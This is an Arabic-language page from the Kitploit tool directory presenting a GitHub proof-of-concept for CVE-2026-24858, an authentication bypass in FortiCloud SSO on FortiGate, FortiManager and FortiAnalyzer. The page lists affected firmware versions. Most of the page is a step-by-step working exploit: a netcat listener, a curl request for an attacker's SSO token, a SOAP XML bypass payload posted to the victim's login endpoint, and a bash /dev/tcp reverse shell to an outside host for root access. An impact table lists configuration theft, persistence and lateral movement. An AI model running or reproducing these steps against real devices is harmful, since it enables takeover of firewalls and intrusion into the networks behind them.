Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass — CVE-2026-24858 FortiCloud Single Sign On (SSO) ميزة مفعّلة افتراضيًا من المصنع بمجرد تسجيل أي FortiGate/FortiManager/FortiAnalyzer تحتوي على ثغرة حرجة في تجاوز المصادقة. | Kitploit
أدوات/GitHubGitHub/absholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubabsholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass

CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

CVE-2026-24858 FortiCloud Single Sign On (SSO) ميزة مفعّلة افتراضيًا من المصنع بمجرد تسجيل أي FortiGate/FortiManager/FortiAnalyzer تحتوي على ثغرة حرجة في تجاوز المصادقة.

عرض المستودع
95منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24858 | تجاوز مصادقة FortiCloud SSO


الملخص التنفيذي

تعد ميزة تسجيل الدخول الموحد (SSO) في FortiCloud ميزة مفعّلة افتراضيًا من المصنع بمجرد تسجيل أي جهاز FortiGate/FortiManager/FortiAnalyzer، وتحتوي على ثغرة حرجة في تجاوز المصادقة.

يمكن للمهاجم الذي يمتلك أي حساب FortiCloud (مجاني أو مدفوع) إعادة استخدام رمز SSO الخاص به لتسجيل الدخول إلى أجهزة عملاء آخرين (الإصدارات المذكورة أدناه) دون معرفة كلمات المرور الخاصة بهم.

يمنح الاستغلال بعد الاختراق وصولًا كاملًا إلى واجهة الإدارة الرسومية وجذر الصدفة (root shell)، مما يسمح باعتراض حركة المرور، أو العبث بشبكات VPN، أو التحرك الجانبي داخل الشبكات الداخلية.

قم بالترقية فورًا أو عطّل FortiCloud SSO حتى يتم إصدار التصحيح.


الإصدارات المتأثرة

المنتجالبرنامج الثابت المعرض للخطرالإصدار المصحح
FortiOS7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6
FortiManager7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9نفس الإصدار الرئيسي/الفرعي +1
FortiAnalyzerنفس النطاقاتنفس الإصدار

إثبات المفهوم (PoC)

  1. جهاز المهاجم
    مستمع لصدفة عكسية:

    root@kitploit:~
    nc -lvnp 4444
    
  2. الحصول على رمز المهاجم (صلاحية 15 دقيقة)

    root@kitploit:~
    curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"[email protected]","password":"AttackerPass123"}'
    

    الاستجابة (مقتطف):

    root@kitploit:~
    {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
    

    انسخ قيمة access_token.

  3. بناء حمولة التجاوز
    احفظها باسم bypass.xml:

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <authRequest>
          <serialNumber>FGT80ETK21000000</serialNumber>
          <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
          <action>login</action>
        </authRequest>
      </soapenv:Body>
    </soapenv:Envelope>
    
  4. الإرسال إلى الضحية (أي برنامج ثابت ≤ الجدول أعلاه)

    root@kitploit:~
    curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
      -H "Content-Type: application/xml" \
      --data @bypass.xml \
      -c cookies.txt
    

    HTTP 200 + Set-Cookie: APSCOOKIE=... → نجاح.

  5. تصفح واجهة الإدارة الرسومية
    افتح المتصفح أو استخدم curl مع ملف الكوكيز المحفوظ:

    root@kitploit:~
    curl -k -b cookies.txt https://<VICTIM-IP>/ng/
    

    → تظهر لوحة التحكم دون طلب كلمة مرور.

  6. جذر الصدفة (أداة CLI)
    داخل الواجهة الرسومية: Dashboard → CLI Console

    root@kitploit:~
    execute bash
    bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
    

    يستقبل المستمع:

    root@kitploit:~
    root@FGT80ETK21000000:/#
    

الأثر

السيناريوالنتيجة
مسؤول للقراءة فقطتصدير كامل التكوين (أسرار VPN، سياسات local-in، تجزئات المستخدمين).
مسؤول للكتابةتعديل قواعد جدار الحماية، إنشاء مستخدمين محليين، تعطيل التسجيل، زرع سكربتات دائمة.
جذر الصدفةتفريغ config.dat، استخراج مفاتيح HA، التنقل إلى الشبكات الفرعية الداخلية، زرع خدمة خلفية.
الحركة الجانبيةيصبح الجهاز نقطة انطلاق؛ شبكات VLAN وأنفاق SSL-VPN موثوقة → اختراق أعمق للشبكة.
سرقة البياناتتمر جميع حركة المرور عبر FortiGate → بروكسي شفاف + حقن شهادات.
تنزيل الأداة